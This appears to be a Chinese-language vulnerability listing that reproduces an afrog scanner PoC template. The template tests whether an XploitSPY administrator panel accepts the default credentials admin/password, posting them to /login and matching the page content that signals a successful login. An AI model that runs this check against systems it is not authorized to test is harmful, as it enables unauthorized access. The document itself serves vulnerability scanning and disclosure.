xploitspy-default-login: XploitSPY - Default Login

日期: 2025-09-01 | 影响软件: XploitSPY | POC: 已公开

漏洞描述

Default login and password to access administrator panel

PoC代码[已公开]

id: xploitspy-default-login

info:
  name: XploitSPY - Default Login
  author: andreluna
  severity: high
  verified: false
  description: |
    Default login and password to access administrator panel
  reference:
    - https://github.com/XploitWizer-Community/XploitSPY
  tags: xploitspy,default-login

set:
  rooturl: request.url
  hostname: request.url.host
rules:
  r0:
    request:
      method: POST
      path: /login
      headers:
        Origin: "{{rooturl}}"
        Content-Type: application/x-www-form-urlencoded
        Referer: "{{rooturl}}/login"
      body: username=admin&password=password&hostname={{hostname}}
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b'Change Password') && response.body.bcontains(b'Logout')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/xploitspy-default-login.yaml

相关漏洞推荐